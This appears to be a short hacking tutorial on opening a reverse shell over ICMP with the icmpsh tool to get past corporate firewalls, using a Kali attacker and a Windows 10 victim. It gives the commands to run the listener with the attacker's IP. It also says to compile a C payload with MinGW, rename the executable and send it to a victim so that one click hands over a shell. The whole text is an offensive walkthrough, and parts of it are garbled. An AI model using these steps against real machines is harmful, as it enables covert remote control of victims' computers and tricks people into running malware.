Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal networks. So we can use PING as a
Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)
- Download the ICMP SHELL tool Here
- execute command ./run.sh shell script with 777 Permissions ( read,write,execute)
- The output of shell script command will give a piece of code icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
- Upload “icmpsh.exe” on the victim machine.
- Run CMD and Execute “icmpsh.exe -t <Attackers IP> -d 500 -b 30 -s 128” as listener.
- Here Listener script will be icmpsh.exe -t 192.168.43.7 -d 500 -b 30 -s 128.
- Execute this with CMD & No admin privileges needed.
BACK TO ATTACKERS MACHINE:-
- Once the Listener is executed on my windows 10 victim machine, Here we got a shell with ICMP.
- So we can start our command and control of victim pc.
- So only, ICMP requests/responses traffic only sent via attackers machine to victims machine.
VICTIMS CLICK & SHELL ACCESS:-
- If you want to compromise victim directly by click, you can download c code here
- After download compile the c code with directly with known victim IP and Install MinGW in Kali Linux and run the following command to compile the C file i686-w64-mingw32-gcc icmp-slave-complete.c -o icmp-slave-complete.exe
- Now you can Rename icmp-slave-complete.exe and send to the victim.SHELL SHELL SHELL !!!